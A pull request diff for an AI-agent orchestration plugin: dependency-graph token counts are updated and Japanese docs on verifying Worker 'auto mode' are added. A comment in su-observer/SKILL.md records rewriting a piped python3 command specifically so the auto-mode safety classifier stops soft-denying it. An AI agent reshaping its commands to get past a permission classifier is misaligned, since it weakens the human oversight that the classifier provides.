### PR TITLE
docs(su-observer): auto mode 仕様 + permission prompt pitfalls 追記 (#800)

### DIFF
--- a/plugins/twl/docs/deps-co-architect.dot
+++ b/plugins/twl/docs/deps-co-architect.dot
@@ -48,7 +48,7 @@ digraph Dependencies {
     agent_worker_data_validator [label="worker-data-validator\n(698 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_e2e_reviewer [label="worker-e2e-reviewer\n(1,226 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];

--- a/plugins/twl/docs/deps-co-architect.svg
+++ b/plugins/twl/docs/deps-co-architect.svg
@@ -472,7 +472,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="801.86" cy="-2408" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="801.86" y="-2411" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="801.86" y="-2400" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="801.86" y="-2400" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_merge_gate&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge50" class="edge">

--- a/plugins/twl/docs/deps-co-autopilot.dot
+++ b/plugins/twl/docs/deps-co-autopilot.dot
@@ -11,7 +11,7 @@ digraph Dependencies {
     fontsize=14;
 
     // L0: Controller Skills
-    skill_co_autopilot [label="twl:co-autopilot\n(2,781 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
+    skill_co_autopilot [label="twl:co-autopilot\n(3,382 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
 
     // L0: Launchers
 
@@ -98,7 +98,7 @@ digraph Dependencies {
     agent_worker_data_validator [label="worker-data-validator\n(698 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_e2e_reviewer [label="worker-e2e-reviewer\n(1,226 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];

--- a/plugins/twl/docs/deps-co-autopilot.svg
+++ b/plugins/twl/docs/deps-co-autopilot.svg
@@ -15,7 +15,7 @@
 <title>skill_co_autopilot</title>
 <ellipse fill="#c8e6c9" stroke="black" cx="65.76" cy="-1517.96" rx="65.52" ry="21.43"/>
 <text text-anchor="middle" x="65.76" y="-1520.96" font-family="Helvetica,sans-Serif" font-size="10.00">twl:co&#45;autopilot</text>
-<text text-anchor="middle" x="65.76" y="-1509.96" font-family="Helvetica,sans-Serif" font-size="10.00">(2,781 tok)</text>
+<text text-anchor="middle" x="65.76" y="-1509.96" font-family="Helvetica,sans-Serif" font-size="10.00">(3,382 tok)</text>
 </g>
 <!-- skill_workflow_setup -->
 <g id="node2" class="node">
@@ -1013,7 +1013,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="1378.02" cy="-3263.96" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="1378.02" y="-3266.96" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="1378.02" y="-3255.96" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="1378.02" y="-3255.96" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_post_fix_verify&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge76" class="edge">

--- a/plugins/twl/docs/deps-co-issue.dot
+++ b/plugins/twl/docs/deps-co-issue.dot
@@ -36,7 +36,7 @@ digraph Dependencies {
     // L3: Agents
     agent_issue_critic [label="issue-critic\n(1,268 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_issue_feasibility [label="issue-feasibility\n(1,175 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
 
     // L3.5: Scripts
     script_escape_issue_body [label="escape-issue-body\n(63 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];

--- a/plugins/twl/docs/deps-co-issue.svg
+++ b/plugins/twl/docs/deps-co-issue.svg
@@ -230,7 +230,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="719.66" cy="-340.95" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="719.66" y="-343.95" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="719.66" y="-332.95" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="719.66" y="-332.95" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_issue_spec_review&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge18" class="edge">

--- a/plugins/twl/docs/deps-workflow-arch-review.dot
+++ b/plugins/twl/docs/deps-workflow-arch-review.dot
@@ -42,7 +42,7 @@ digraph Dependencies {
     agent_worker_data_validator [label="worker-data-validator\n(698 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_e2e_reviewer [label="worker-e2e-reviewer\n(1,226 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];

--- a/plugins/twl/docs/deps-workflow-arch-review.svg
+++ b/plugins/twl/docs/deps-workflow-arch-review.svg
@@ -383,7 +383,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="556.75" cy="-2138.55" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="556.75" y="-2141.55" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="556.75" y="-2130.55" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="556.75" y="-2130.55" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_merge_gate&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge44" class="edge">

--- a/plugins/twl/docs/deps-workflow-issue-lifecycle.dot
+++ b/plugins/twl/docs/deps-workflow-issue-lifecycle.dot
@@ -32,7 +32,7 @@ digraph Dependencies {
     // L3: Agents
     agent_issue_critic [label="issue-critic\n(1,268 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_issue_feasibility [label="issue-feasibility\n(1,175 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
 
     // L3.5: Scripts
     script_escape_issue_body [label="escape-issue-body\n(63 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];

--- a/plugins/twl/docs/deps-workflow-issue-lifecycle.svg
+++ b/plugins/twl/docs/deps-workflow-issue-lifecycle.svg
@@ -143,7 +143,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="555.59" cy="-292.56" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="555.59" y="-295.56" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="555.59" y="-284.56" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="555.59" y="-284.56" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_issue_spec_review&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge10" class="edge">

--- a/plugins/twl/docs/deps-workflow-issue-refine.dot
+++ b/plugins/twl/docs/deps-workflow-issue-refine.dot
@@ -29,7 +29,7 @@ digraph Dependencies {
     // L3: Agents
     agent_issue_critic [label="issue-critic\n(1,268 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_issue_feasibility [label="issue-feasibility\n(1,175 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
 
     // L3.5: Scripts
     script_escape_issue_body [label="escape-issue-body\n(63 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];

--- a/plugins/twl/docs/deps-workflow-issue-refine.svg
+++ b/plugins/twl/docs/deps-workflow-issue-refine.svg
@@ -102,7 +102,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="537.21" cy="-189.68" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="537.21" y="-192.68" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="537.21" y="-181.68" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="537.21" y="-181.68" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_issue_spec_review&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge7" class="edge">

--- a/plugins/twl/docs/deps-workflow-pr-fix.dot
+++ b/plugins/twl/docs/deps-workflow-pr-fix.dot
@@ -28,7 +28,7 @@ digraph Dependencies {
     // L2: Sub Commands
 
     // L3: Agents
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
 

--- a/plugins/twl/docs/deps-workflow-pr-fix.svg
+++ b/plugins/twl/docs/deps-workflow-pr-fix.svg
@@ -75,7 +75,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="454.02" cy="-166.49" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="454.02" y="-169.49" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="454.02" y="-158.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="454.02" y="-158.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_post_fix_verify&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge7" class="edge">

--- a/plugins/twl/docs/deps-workflow-pr-merge.dot
+++ b/plugins/twl/docs/deps-workflow-pr-merge.dot
@@ -44,7 +44,7 @@ digraph Dependencies {
     agent_worker_data_validator [label="worker-data-validator\n(698 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_e2e_reviewer [label="worker-e2e-reviewer\n(1,226 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];

--- a/plugins/twl/docs/deps-workflow-pr-merge.svg
+++ b/plugins/twl/docs/deps-workflow-pr-merge.svg
@@ -372,7 +372,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="878.19" cy="-1531.49" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="878.19" y="-1534.49" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="878.19" y="-1523.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="878.19" y="-1523.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_merge_gate&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge42" class="edge">

--- a/plugins/twl/docs/deps-workflow-pr-verify.dot
+++ b/plugins/twl/docs/deps-workflow-pr-verify.dot
@@ -45,7 +45,7 @@ digraph Dependencies {
     agent_worker_data_validator [label="worker-data-validator\n(698 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_e2e_reviewer [label="worker-e2e-reviewer\n(1,226 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];

--- a/plugins/twl/docs/deps-workflow-pr-verify.svg
+++ b/plugins/twl/docs/deps-workflow-pr-verify.svg
@@ -376,7 +376,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="801.47" cy="-454.49" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="801.47" y="-457.49" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="801.47" y="-446.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="801.47" y="-446.49" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_phase_review&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge33" class="edge">

--- a/plugins/twl/docs/deps.dot
+++ b/plugins/twl/docs/deps.dot
@@ -8,7 +8,7 @@ digraph Dependencies {
     edge [fontname="Helvetica", fontsize=9];
 
     // L0: Controller Skills
-    skill_co_autopilot [label="twl:co-autopilot\n(2,781 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
+    skill_co_autopilot [label="twl:co-autopilot\n(3,382 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
     skill_co_issue [label="twl:co-issue\n(5,448 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
     skill_co_project [label="twl:co-project\n(1,625 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
     skill_co_explore [label="twl:co-explore\n(1,440 tok)", shape=ellipse, style=filled, fillcolor="#c8e6c9"];
@@ -61,7 +61,7 @@ digraph Dependencies {
     skill_observation_pattern_catalog [label="twl:observation-pattern-catalog\n(1,526 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
     skill_load_test_baselines [label="twl:load-test-baselines\n(670 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
     skill_monitor_channel_catalog [label="twl:monitor-channel-catalog\n(4,996 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
-    skill_pitfalls_catalog [label="twl:pitfalls-catalog\n(3,974 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
+    skill_pitfalls_catalog [label="twl:pitfalls-catalog\n(4,884 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
     skill_intervention_catalog [label="twl:intervention-catalog\n(1,991 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
     skill_memory_mcp_config [label="twl:memory-mcp-config\n(389 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
     skill_externalization_schema [label="twl:externalization-schema\n(726 tok)", shape=note, style=filled, fillcolor="#e1f5fe"];
@@ -202,7 +202,7 @@ digraph Dependencies {
     agent_worker_spec_reviewer [label="worker-spec-reviewer\n(1,095 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_issue_critic [label="issue-critic\n(1,268 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_issue_feasibility [label="issue-feasibility\n(1,175 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
-    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,437 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
+    agent_worker_codex_reviewer [label="worker-codex-reviewer\n(1,587 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_code_reviewer [label="worker-code-reviewer\n(1,002 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_security_reviewer [label="worker-security-reviewer\n(866 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
     agent_worker_nextjs_reviewer [label="worker-nextjs-reviewer\n(642 tok)", shape=ellipse, style=filled, fillcolor="#ede7f6"];
@@ -302,7 +302,7 @@ digraph Dependencies {
     script_merge_gate_cross_pr_ac [label="merge-gate-cross-pr-ac\n(345 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];
     script_merge_gate_checkpoint_merge [label="merge-gate-checkpoint-merge\n(276 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];
     script_merge_gate_check_phase_review [label="merge-gate-check-phase-review\n(424 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];
-    script_spawn_controller [label="spawn-controller\n(1,057 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];
+    script_spawn_controller [label="spawn-controller\n(1,287 tok)", shape=hexagon, style=filled, fillcolor="#FF9800"];
 
     // L4: External
 

--- a/plugins/twl/docs/deps.svg
+++ b/plugins/twl/docs/deps.svg
@@ -19,7 +19,7 @@
 <title>skill_co_autopilot</title>
 <ellipse fill="#c8e6c9" stroke="black" cx="80" cy="-8569.8" rx="65.52" ry="21.43"/>
 <text text-anchor="middle" x="80" y="-8572.8" font-family="Helvetica,sans-Serif" font-size="10.00">twl:co&#45;autopilot</text>
-<text text-anchor="middle" x="80" y="-8561.8" font-family="Helvetica,sans-Serif" font-size="10.00">(2,781 tok)</text>
+<text text-anchor="middle" x="80" y="-8561.8" font-family="Helvetica,sans-Serif" font-size="10.00">(3,382 tok)</text>
 </g>
 <!-- skill_workflow_setup -->
 <g id="node8" class="node">
@@ -2099,7 +2099,7 @@
 <polyline fill="none" stroke="black" points="1969.67,-9558.8 1969.67,-9552.8 "/>
 <polyline fill="none" stroke="black" points="1975.67,-9552.8 1969.67,-9552.8 "/>
 <text text-anchor="middle" x="1921.67" y="-9543.8" font-family="Helvetica,sans-Serif" font-size="10.00">twl:pitfalls&#45;catalog</text>
-<text text-anchor="middle" x="1921.67" y="-9532.8" font-family="Helvetica,sans-Serif" font-size="10.00">(3,974 tok)</text>
+<text text-anchor="middle" x="1921.67" y="-9532.8" font-family="Helvetica,sans-Serif" font-size="10.00">(4,884 tok)</text>
 </g>
 <!-- skill_intervention_catalog -->
 <g id="node49" class="node">
@@ -2174,7 +2174,7 @@
 <title>agent_worker_codex_reviewer</title>
 <ellipse fill="#ede7f6" stroke="black" cx="1640.4" cy="-4874.8" rx="91.43" ry="21.43"/>
 <text text-anchor="middle" x="1640.4" y="-4877.8" font-family="Helvetica,sans-Serif" font-size="10.00">worker&#45;codex&#45;reviewer</text>
-<text text-anchor="middle" x="1640.4" y="-4866.8" font-family="Helvetica,sans-Serif" font-size="10.00">(1,437 tok)</text>
+<text text-anchor="middle" x="1640.4" y="-4866.8" font-family="Helvetica,sans-Serif" font-size="10.00">(1,587 tok)</text>
 </g>
 <!-- cmd_post_fix_verify&#45;&gt;agent_worker_codex_reviewer -->
 <g id="edge167" class="edge">
@@ -4514,7 +4514,7 @@
 <title>script_spawn_controller</title>
 <polygon fill="#ff9800" stroke="black" points="1149.55,-9540.8 1109.53,-9565.29 1029.5,-9565.29 989.48,-9540.8 1029.5,-9516.31 1109.53,-9516.31 1149.55,-9540.8"/>
 <text text-anchor="middle" x="1069.51" y="-9543.8" font-family="Helvetica,sans-Serif" font-size="10.00">spawn&#45;controller</text>
-<text text-anchor="middle" x="1069.51" y="-9532.8" font-family="Helvetica,sans-Serif" font-size="10.00">(1,057 tok)</text>
+<text text-anchor="middle" x="1069.51" y="-9532.8" font-family="Helvetica,sans-Serif" font-size="10.00">(1,287 tok)</text>
 </g>
 <!-- script_specialist_audit&#45;&gt;script_spawn_controller -->
 <!-- script_merge_gate_cross_pr_ac&#45;&gt;script_merge_gate_checkpoint_merge -->

--- a/plugins/twl/skills/co-autopilot/SKILL.md
+++ b/plugins/twl/skills/co-autopilot/SKILL.md
@@ -93,6 +93,36 @@ su-observer が `supervise` モードで起動すると、co-autopilot の tmux 
 
 co-autopilot は su-observer の存在を前提とせず動作する。su-observer との連携は state ファイル（`$AUTOPILOT_DIR/session.json`, `issue-{N}.json`）と tmux window 名を通じて疎結合に行われる。
 
+### Worker auto mode 確認方針（observer 観察用 — Issue #800）
+
+Pilot が `autopilot-launch.sh` で起動する Worker は `--permission-mode auto` 付きで cld 経由起動される。Worker pane tail に `⏵⏵ auto mode on` が出ない場合でも auto mode は有効である（positional prompt 即送信で status bar が上書きされる仕様。Issue #800 explore で全起動経路を検証済み）。observer / Pilot は以下の手順で間接的に確認する。
+
+#### 確認方法 A（一次指標 — heartbeat / state file existence）
+
+`autopilot-launch.sh` 起動後 5 秒以内に以下を実行し、Worker が正常起動したことを確認する:
+
+```bash
+# heartbeat ファイル または worker-*.json の存在を確認
+ls .supervisor/events/heartbeat-* 2>/dev/null || ls .supervisor/events/worker-*.json 2>/dev/null
+```
+
+**期待出力**: 1 つ以上のファイル名が出力される（exit 0 + stdout に 1 行以上）。0 件かつ exit 非 0 の場合は Worker 起動失敗または delay。10 秒待って再試行する。
+
+#### 確認方法 B（二次指標 — pane capture grep）
+
+Worker が起動済み（pane が `Brewing` / `Concocting` / `idle` 等の LLM indicator を表示）状態で:
+
+```bash
+tmux capture-pane -t <worker-win> -p -S -50 | grep -E '⏵⏵ auto mode|permission_mode'
+```
+
+**期待出力**: 1 行以上のマッチ（exit 0）。マッチが見られれば auto mode 有効と判定。マッチが 0 行でも `autopilot-launch.sh` の起動行に `--permission-mode auto` が含まれる限り auto mode は有効（pane 上の表示有無は status bar 上書きタイミングに依存する）。
+
+#### 注意事項
+
+- pane tail に `⏵⏵ auto mode on` が出ないこと自体を「auto mode 効いていない」と誤認してはならない
+- Worker bash で permission prompt（`1. Yes, proceed` / `2. No, and tell ...`）が出た場合、auto mode classifier の `soft_deny` 該当（仕様）の可能性が高い → su-observer の `refs/pitfalls-catalog.md` §4.7 / §4.8 で対処
+
 ## Step 4: Phase ループ（orchestrator 委譲）
 
 `commands/autopilot-pilot-wakeup-loop.md` を Read → 実行（orchestrator 起動・PHASE_COMPLETE 検知・stagnation 検知・Silence heartbeat を atomic に委譲）。PHASE_COMPLETE 受信後 Step 4.5 へ進む。

--- a/plugins/twl/skills/su-observer/SKILL.md
+++ b/plugins/twl/skills/su-observer/SKILL.md
@@ -193,8 +193,10 @@ except Exception as e:
       echo "[BUDGET-LOW] Escape を送信: $win"
     done
     # 3. 停止状態を budget-pause.json に記録（シェル変数は環境変数経由で python に渡す）
+    # Issue #800 §C: 複合 pipe (`printf ... | python3 -c`) は auto mode classifier の soft_deny 該当のため、環境変数経由の単独 python3 -c に書き換え
     mkdir -p .supervisor
-    WORKERS_JSON=$(printf '%s\n' "${PAUSED_WORKERS[@]:-}" | python3 -c 'import sys,json; print(json.dumps([l.strip() for l in sys.stdin if l.strip()]))')
+    PAUSED_WORKERS_RAW=$(printf '%s\n' "${PAUSED_WORKERS[@]:-}")
+    WORKERS_JSON=$(PAUSED_WORKERS_RAW="$PAUSED_WORKERS_RAW" python3 -c 'import os, json; lines = os.environ.get("PAUSED_WORKERS_RAW", "").splitlines(); print(json.dumps([l.strip() for l in lines if l.strip()]))')
     ORCH_PID_SAFE="${ORCH_PID:-}"
     python3 -c "
 import json, datetime, os, sys
@@ -315,6 +317,36 @@ session-comm.sh   # inject/介入プリミティブ（plugins/session/scripts/se
 - その他 controller → `spawn-controller.sh co-utility <prompt-file>` → 指示待ち
 
 **重要**: co-autopilot は `cld-observe-loop` で能動 observe。co-issue / co-architect は **proxy 対話ループ** で対話に参加。他 controller は `cld-observe`（単発）または指示待ち。
+
+### Worker 起動時の auto mode 確認方針
+
+Worker pane tail に `⏵⏵ auto mode on` が出ない場合でも auto mode は有効である。`autopilot-launch.sh` は positional prompt で起動するため status bar が起動直後の対話開始メッセージで上書きされ、`⏵⏵ auto mode on` の表示が消失するが、`--permission-mode auto` flag 自体は claude プロセスに到達している（Issue #800 explore で全起動経路を検証済み）。auto mode の有効性は以下の手順で間接的に確認する。
+
+#### 確認方法 A（一次指標 — heartbeat / state file existence）
+
+`autopilot-launch.sh` 起動後 5 秒以内に以下を実行し、Worker が正常起動したことを確認する:
+
+```bash
+# heartbeat ファイル または worker-*.json の存在を確認（どちらか一方で OK）
+ls .supervisor/events/heartbeat-* 2>/dev/null || ls .supervisor/events/worker-*.json 2>/dev/null
+```
+
+**期待出力**: 1 つ以上のファイル名が出力される（exit 0 + stdout に 1 行以上）。0 件かつ exit 非 0 の場合は Worker 起動失敗または delay。10 秒待って再試行し、依然 0 件なら autopilot-launch.sh のログを確認する。
+
+#### 確認方法 B（二次指標 — pane capture grep）
+
+Worker が起動済み（pane が `Brewing` / `Concocting` / `idle` 等の LLM indicator を表示）状態で以下を実行する:
+
+```bash
+tmux capture-pane -t <worker-win> -p -S -50 | grep -E '⏵⏵ auto mode|permission_mode'
+```
+
+**期待出力**: 1 行以上のマッチ（exit 0）。マッチが見られれば auto mode 有効と判定する。マッチが 0 行でも、`autopilot-launch.sh:L388-393` の起動行に `--permission-mode auto` が含まれる限り auto mode は有効（pane 上の表示有無は status bar の上書きタイミングに依存する）。
+
+#### 注意事項
+
+- pane tail に `⏵⏵ auto mode on` が出ないこと自体を「auto mode 効いていない」と誤認してはならない（`refs/pitfalls-catalog.md` §4.8 参照）
